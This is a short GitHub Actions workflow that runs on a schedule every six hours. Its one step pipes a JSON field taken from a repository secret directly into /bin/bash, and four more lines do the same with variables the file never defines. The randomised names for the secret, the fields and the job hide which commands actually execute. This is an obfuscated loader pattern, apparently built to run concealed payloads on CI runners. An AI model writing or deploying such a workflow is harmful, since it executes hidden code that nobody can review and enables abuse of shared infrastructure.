name: zhongxueai3645
on:
  workflow_dispatch:
  schedule:
    - cron: '17 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhongxueai3645
        env:
          ewnft9: ${{ secrets.ewnft9 }}
        run: |
          echo $ewnft9 | jq -r .mga6 | /bin/bash
          echo $pyxon27 | jq -r .ztu0875 | /bin/bash
          echo $vmnz72853 | jq -r .w8 | /bin/bash
          echo $mcv73831 | jq -r .ke940 | /bin/bash
          echo $cjewo77276 | jq -r .qx41 | /bin/bash

